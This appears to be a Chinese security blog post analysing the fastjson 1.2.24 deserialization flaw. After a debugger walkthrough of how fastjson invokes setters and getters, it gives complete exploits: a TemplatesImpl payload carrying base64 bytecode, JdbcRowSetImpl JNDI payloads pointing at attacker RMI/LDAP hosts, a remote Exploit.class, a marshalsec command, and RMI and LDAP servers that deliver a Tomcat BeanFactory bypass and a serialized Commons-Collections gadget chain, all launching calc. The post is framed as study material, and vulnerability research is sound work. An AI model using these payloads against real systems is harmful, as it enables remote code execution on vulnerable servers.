fastjson<=1.2.24反序列化分析

前言

之前还没有好好的分析过fastjson,每次在实战的时候也比较茫然,不清楚原理拿exp乱打很容易会漏洞。而且一位信奉别人的写的exp并不太好,反序列化漏洞利用涉及到各种版本问题,网上公开的exp拿来学习可以,就实战来说,其全面性还是差点意思。因此自己分析一下fastjson,打打基础,下面开始。

代码分析

首先给一段代码,让大家了解到fastjson的基本用法

com.huahua.DemoUser

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package com.huahua;


public class DemoUser {
    private int age;
    private String username;
    private String secret;

    public void setAge(int age) {this.age = age;}
    public int getAge() {
        return age;
    }
    public void setAge(Integer age){
        this.age=age;
    }
    public String getUsername() {
        return username;
    }
    public void setUsername(String username) {
        this.username = username;
    }
    public String getSecret() {
        return secret;
    }
    @Override
    public String toString() {
        return this.age + "," + this.username + "," + this.secret;
    }
}

com.huahua.Main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package com.huahua;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.serializer.SerializerFeature;
import java.lang.reflect.Field;

public class Main {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException {
        DemoUser demo2User = new DemoUser();
        Field ageFiled =demo2User.getClass().getDeclaredField("age");
        ageFiled.setAccessible(true);
        ageFiled.set(demo2User,10);
        demo2User.setUsername("sijidou");
        String ser1 = JSON.toJSONString(demo2User);         //对象转化为json
        System.out.println(ser1);
        String ser2 = JSON.toJSONString(demo2User, SerializerFeature.WriteClassName);     //对象转化为json并记录了对象所属类的信息
        System.out.println(ser2);
        System.out.println("==========完美的分割线============");
        DemoUser demo2User1 = (DemoUser) JSON.parse(ser2);       //将json转化为对象,没有@type时会报错
        System.out.println(demo2User1);
        Object demo2User2 = JSON.parseObject(ser2);         //返回对象为com.alibaba.fastjson.JSONObject
        System.out.println(demo2User2);
        Object demo2User3 = JSON.parseObject(ser2, DemoUser.class);      //返回对象由@type来决定,这里返回DemoUser类型
        System.out.println(demo2User3);
        Object demo2User4 = JSON.parseObject(ser2,Object.class, Feature.SupportNonPublicField);    // 会把Json数据没有setter方法的私有类也给还原
        System.out.println(demo2User4);
    }
}

输出如下

对照着示例可以看每个方法的作用是什么

先说明一些结论:

1、fastjson在反序列化时会调用部分符合条件的setter和getter方法

2、对于没有setter的可见Filed,fastjson会正确赋值(就是类似public String str这种,就算没有setter方法,fastjson也会正确赋值)

3、对于不可见Field且未提供setter方法,fastjson默认不会赋值,在加上Feature.SupportNonPublicField属性后,fastjson对不可见且未提供setter方法的字段自动赋值(private String str)

着重要说明的是下面两个方法的区别

1
2
3
JSON.parseObject(ser2,Object.class, Feature.SupportNonPublicField); // 会把Json数据没有setter方法的私有类也给还原

Object demo2User2 = JSON.parseObject(ser2); //返回对象为com.alibaba.fastjson.JSONObject

以上结论在参考链接中的第一个中作者有做实验,大家可以自己跟着做一次,这里只贴了结论。

从我贴图的实验来看,fastjson可以将字符串类型的json数据恢复成一个对象。我们的{“@type”:”com.huahua.DemoUser”,”age”:10,”username”:”sijidou”}就被恢复成了com.huahua.DemoUser类的一个对象,而age和username则是其属性。我们前面列出的三条结论中的第一条就是会通过反序列化调用部分符合条件的setter和getter方法。

下面我们分析漏洞

FASTJSON如何调用到GETTER和SETTER

之前结论说过fastjson会调用到部分符合条件的getter和setter,这个符合条件是什么意思呢。我们先写一个demo,然后跟下去,看fastjson处理流程。

com.huahua.DemoUser

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
package com.huahua;


public class DemoUser {
    private int age;
    private String username;
    private String secret;

    public int getAge() {
        System.out.println("getAge");
        return age;
    }

    public void setAge(int age) {
        System.out.println("setAge");
        this.age = age;
    }

    public String getUsername() {
        System.out.println("getUsername");
        return username;
    }

    public void setUsername(String username) {
        System.out.println("setUsername");
        this.username = username;
    }

    public String getSecret() {
        System.out.println("getSecret");
        return secret;
    }

    public void setSecret(String secret) {
        System.out.println("setSecret");
        this.secret = secret;
    }

    @Override
    public String toString() {
        return this.age + "," + this.username + "," + this.secret;
    }
}

com.huahua.Main2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package com.huahua;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;

public class Main2 {
    public static void main(String args[]){
        ParserConfig config = new ParserConfig();
        //ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String jsonstr = "{\"@type\":\"com.huahua.User\", \"age\":24,\"userName\":\"李四\",\"role\":{}}";
        try {
            JSON.parseObject(jsonstr,Object.class,config,Feature.SupportNonPublicField);
        }catch (Exception e) {
            System.out.println(e.getMessage());
        }

    }
}

在JSON.parseObject处下断点,开启动态调试。

进入parseObject方法

然后调用DefaultJSONParser类的parseObject方法

此处的this.lexer是fastjson的一个类似词法解析器的东西,token能决断下一步需要做什么样的解析操作。

最后调用到了derializer.deserialze(this, type, fieldName);

本处的derializer为JavaObjectDeserializer的实体类。

进入deserialze方法后,由于type是Object.class,所以我们最后会执行到parser.parse(fieldName)。我们继续跟入。

调用this.parseObject((Map)object, fieldName)方法

从上面箭头标注的位置,就真正的开始词法解析了,fastjson会剥离出我们字符串中的@type对应的类名,进行实例化。感兴趣的可以跟着解析器看是如何解析的,这里图就不贴了。

我们接下来一直走到318行的this.config.getDeserializer(clazz),这里的clazz已经被解析出来时com.huahua.User了。这个地方和之前说的调用符合条件的getter和setter方法有关,我们跟入方法来看。

最后调用到this.createJavaBeanDeserializer(clazz, (Type)type)

然后调用到JavaBeanInfo.build(clazz, type, this.propertyNamingStrategy)

在build方法内就是重头戏了,fastjson会判断复原类的setter和getter方法是否满足某些条件,满足条件的会被加到一个列表中,后面会进行调用,不满足的则pass。

首先从312到395是判断类中的set方法是否满足条件的,部分内容如下:

methods也就是var30内容如下,可以看到是我们要恢复类中的全部方法。

首先经过了如下的判断:

1
if (methodName.length() >= 4 && !Modifier.isStatic(method.getModifiers()) && (method.getReturnType().equals(Void.TYPE) || method.getReturnType().equals(method.getDeclaringClass()))) {

简单说,如果方法的名字长度>=4并且方法不是静态方法并且(方法的返回值为空或返回值为要恢复的类,在本例中为com.huahua.User) 则进入if方法中。

第二个判断条件,方法的参数必须只有一个,代码如下。

第三个条件,方法必须以set开头,代码如下

最后会调用add加入到一个fieldList里面,代码如下

这样一个关于setter的判断就结束了。关于getter的判断在455到478代码里面,大家可以自己看,下面给出结论。

满足条件的setter:

1
2
3
4
方法名长度大于4且以set开头
非静态函数        
返回类型为void或当前类
参数个数为1个

满足条件的getter:

1
2
3
4
5
方法名长度大于等于4        
非静态方法
以get开头且第4个字母为大写
无参数
返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong

我比较懒,重复造句子没有意义。上面结论来自:http://www.lmxspace.com/2019/06/29/FastJson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/

这一part结束,下面回到下面图片的代码位置,因为我们上次是从this.config.getDeserializer(clazz)进去的,现在这里重要内容分析完了,就继续走流程。首先在JavaBeanDeserializer的285行打一个断点,跟入deserializer.deserialze(this, clazz, fieldName)。

之所以直接在这里下断点,是因为我们之前调用的deserializer.deserialze(this, clazz, fieldName)是一个asm生成的类,我不太清楚这种类如何调试,所以干催打在了其中间调用到了一个方法的位置。

我们发现此时我们的User类已经在asm类中被实例化了。但值都没有赋予,下面跟代码。

一直走到这一步,然后跟入

在这个方法中,fastjson选择了当前要处理的字段的反序列化处理器fieldDeserializer,走到上面箭头处继续跟入。

经过一些处理之后进入到this.setValue(object, value)

取出了this.fieldInfo中的method,在这里就是setAge。也同样可能是setxxx或者getxxx。

最后反射调用

FASTJSON<=1.2.24

首先使用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl这个gadget,看过我前面cc链分析的应该比较清楚这个gadget。通过将该类的_bytecode填充为恶意类的字节码,就可以做到将字节码恢复为类并实例化,进而触发命令执行代码。

这里使用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl这个gadget的原因在于该类中有一个getter方法会触发到newTransformer方法,该方法会恢复_bytecode并实例化。这个方法就是getOutputProperties()。他对应的属性字段为_outputProperties,这个属性的类型为java.util.Properties继承了Map,所以满足之前关于调用getter方法的结论。因此如果我们把这个属性在json字符串中加入,最后就可以调用到getOutputProperties()。

触发代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
package com.huahua;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

public class trigger {
    public static void main(String args[]){
        String jsonStr="{\n" +
                "  \"@type\" : \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\n" +
                "  \"_bytecodes\" : [\"yv66vgAAADQAPQoADQAcCQAdAB4IAB8KACAAIQcAIggAIwoAJAAlCgAkACYKACcAKAcAKQoACgAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACkV4Y2VwdGlvbnMHAC0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwApAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwADgAPBwAuDAAvADABAAVQd25lZAcAMQwAMgAzAQAQamF2YS9sYW5nL1N0cmluZwEABGNhbGMHADQMADUANgwANwA4BwA5DAA6ADsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAA8AA8BABJ0ZXN0X2Zhc3Rqc29uL0V2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA2VycgEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAB3dhaXRGb3IBAAMoKUkBAA9wcmludFN0YWNrVHJhY2UAIQAMAA0AAAAAAAQAAQAOAA8AAQAQAAAAHQABAAEAAAAFKrcAAbEAAAABABEAAAAGAAEAAAAJAAEAEgATAAIAEAAAABkAAAADAAAAAbEAAAABABEAAAAGAAEAAAAXABQAAAAEAAEAFQABABIAFgACABAAAAAZAAAABAAAAAGxAAAAAQARAAAABgABAAAAHAAUAAAABAABABUACAAXAA8AAQAQAAAAawAEAAEAAAAmsgACEgO2AAQEvQAFWQMSBlNLuAAHKrYACLYACVenAAhLKrYAC7EAAQAIAB0AIAAKAAIAEQAAAB4ABwAAAAsACAANABIADgAdABEAIAAPACEAEAAlABIAGAAAAAcAAmAHABkEAAEAGgAAAAIAGw\"],\n" +
                "  \"_name\" : \"a\",\n" +
                "  \"_tfactory\" : {},\n" +
                "  \"outputProperties\" : {}\n" +
                "}\n";
        JSON.parseObject(jsonStr,Object.class, Feature.SupportNonPublicField);
    }
}

不过我们注意到,这种方法需要对方代码中设置Feature.SupportNonPublicField属性,这个要求比较苛刻。如果对方没设置的话,那么我们只能换种方式利用。

JNDI注入利用

触发代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
package com.huahua;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

public class trigger {
    public static void main(String args[]){
//        String jsonStr="{\n" +
////                "  \"@type\" : \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\n" +
////                "  \"_bytecodes\" : [\"yv66vgAAADQAPQoADQAcCQAdAB4IAB8KACAAIQcAIggAIwoAJAAlCgAkACYKACcAKAcAKQoACgAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACkV4Y2VwdGlvbnMHAC0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwApAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwADgAPBwAuDAAvADABAAVQd25lZAcAMQwAMgAzAQAQamF2YS9sYW5nL1N0cmluZwEABGNhbGMHADQMADUANgwANwA4BwA5DAA6ADsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAA8AA8BABJ0ZXN0X2Zhc3Rqc29uL0V2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA2VycgEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAB3dhaXRGb3IBAAMoKUkBAA9wcmludFN0YWNrVHJhY2UAIQAMAA0AAAAAAAQAAQAOAA8AAQAQAAAAHQABAAEAAAAFKrcAAbEAAAABABEAAAAGAAEAAAAJAAEAEgATAAIAEAAAABkAAAADAAAAAbEAAAABABEAAAAGAAEAAAAXABQAAAAEAAEAFQABABIAFgACABAAAAAZAAAABAAAAAGxAAAAAQARAAAABgABAAAAHAAUAAAABAABABUACAAXAA8AAQAQAAAAawAEAAEAAAAmsgACEgO2AAQEvQAFWQMSBlNLuAAHKrYACLYACVenAAhLKrYAC7EAAQAIAB0AIAAKAAIAEQAAAB4ABwAAAAsACAANABIADgAdABEAIAAPACEAEAAlABIAGAAAAAcAAmAHABkEAAEAGgAAAAIAGw\"],\n" +
////                "  \"_name\" : \"a\",\n" +
////                "  \"_tfactory\" : {},\n" +
////                "  \"outputProperties\" : {}\n" +
////                "}\n";
////        JSON.parseObject(jsonStr,Object.class, Feature.SupportNonPublicField);
        String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://xx.xx.xx.xx:9999/Exploit\",\"autoCommit\":true}";
        try {
            System.out.println(payload);
            JSON.parseObject(payload);
        } catch (Exception e) {
            System.out.println(e.getMessage());
        }

    }
}

查看com.sun.rowset.JdbcRowSetImpl代码,发现其dataSourceName和autoCommit属性都有自身的setter方法,所以在没有Feature.SupportNonPublicField的支持下也可以恢复。

流程:

1、编译一个Exploit.class,内容如下,注意不能有包名。编译好之后把Exploit.class(而非Exploit.java)上传到vps上,启动VPS的web服务,把Exploit.class放在web能访问到的地方,这里我放在了根目录。

1
2
3
4
5
6
7
8
9
10
11
public class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String[] cmd = {"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

2、启动RMI或者LDAP服务器,可以使用marshalsec进行快速启动

1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.50.131:8000/#Exploit 9999

3、运行触发代码,注意要使用符合要求的jdk,因为jndi注入是由jdk版本限制的

在tomcat环境下绕过jndi注入的jdk限制

pom.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>fastjson-1.2.24_jdk1.7</artifactId>
    <version>1.0-SNAPSHOT</version>

<dependencies>
    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.24</version>
    </dependency>
    <dependency>
        <groupId>org.apache.tomcat</groupId>
        <artifactId>tomcat-catalina</artifactId>
        <version>9.0.20</version>
    </dependency>
    <dependency>
        <groupId>org.apache.tomcat</groupId>
        <artifactId>tomcat-jasper</artifactId>
        <version>9.0.20</version>
    </dependency>
</dependencies>
</project>

启动一个RMIServer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package com.huahua.RMI;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {
    public static void lanuchRMIregister(Integer rmi_port) throws Exception {
        System.out.println("Creating RMI Registry, RMI Port:"+rmi_port);
        Registry registry = LocateRegistry.createRegistry(rmi_port);
        /** Payload2: Exploit with JNDI Reference with local factory Class **/
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "KINGX=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("KINGX", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));
        /** Payload2 end **/
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
        registry.bind("Exploit", referenceWrapper);
        System.out.println(referenceWrapper.getReference());
    }
    public static void main(String args[]) throws Exception {
        RmiServer.lanuchRMIregister(9908);
    }

}

触发代码就是jndi的触发代码。这种方式是利用的目标服务器本地的classpath中存在tomcat的包,恶意的rmi服务器返回了一个reference,该reference的factory为org.apache.naming.factory.BeanFactory,通过这个工厂实例化出了一个恶意类进而执行命令。

通过ldpa设置存储java对象为javaSerializedData绕过jndi

ldap Server代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
package com.huahua.LDAP;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import com.unboundid.util.Base64;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.io.FileNotFoundException;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.text.ParseException;

public class LdapServer
{
    private static final String LDAP_BASE = "dc=example,dc=com";
    public static void main(String[] agv)
    {
        int port = 1389;
        String args[] = {"http://localhost:8000/#Exploit"};
        if ((args.length < 1) || (args[0].indexOf('#') < 0))
        {
            System.err.println(LdapServer.class.getSimpleName() + " <codebase_url#classname> [<port>]");
            System.exit(-1);
        }
        else if (args.length > 1)
        {
            port = Integer.parseInt(args[1]);
        }
        try
        {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(new String[] { "dc=example,dc=com" });
            config.setListenerConfigs(
                    new InMemoryListenerConfig[] {
                            new InMemoryListenerConfig(
                                    "listen",
                                    InetAddress.getByName("0.0.0.0"), port,
                                    ServerSocketFactory.getDefault(),
                                    SocketFactory.getDefault(),
                                    (SSLSocketFactory)SSLSocketFactory.getDefault()) }
            );
            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[0])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();
        }
        catch (Exception e)
        {
            e.printStackTrace();
        }
    }
    private static class OperationInterceptor
            extends InMemoryOperationInterceptor
    {
        private URL codebase;
        public OperationInterceptor(URL cb)
        {
            this.codebase = cb;
        }
        public void processSearchResult(InMemoryInterceptedSearchResult result)
        {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try
            {
                sendResult(result, base, e);
            }
            catch (Exception e1)
            {
                e1.printStackTrace();
            }
        }
        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e)
                throws LDAPException, MalformedURLException, FileNotFoundException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "foo");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }
//            e.addAttribute("javaCodeBase", cbstring);
//            e.addAttribute("objectClass", "javaNamingReference");
//            e.addAttribute("javaFactory", this.codebase.getRef());





            //jjj.toString()
//gadget 内容放到 javaSerializeData中
            try {
                e.addAttribute("javaSerializedData",Base64.decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AARjYWxjdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg="));
                result.sendSearchEntry(e);
                result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
            } catch (ParseException ex) {
                ex.printStackTrace();
            }
        }


    }
}

base64中的代码为二进制数据,在客户端lookup之后会在客户端进行反序列化,这里的数据是cc链的序列化内容,如果目标存在common-collections3.1就会弹出计算器。

触发代码

1
2
3
4
5
6
7
String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",\"autoCommit\":true}";
        try {
            System.out.println(payload);
            JSON.parseObject(payload);
        } catch (Exception e) {
            System.out.println(e.getMessage());
        }

参考链接

https://www.lz80.com/4652.html

https://www.freebuf.com/column/207439.html

http://www.lmxspace.com/2019/06/29/FastJson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

huahua<br><br>虚心学习,不断进步。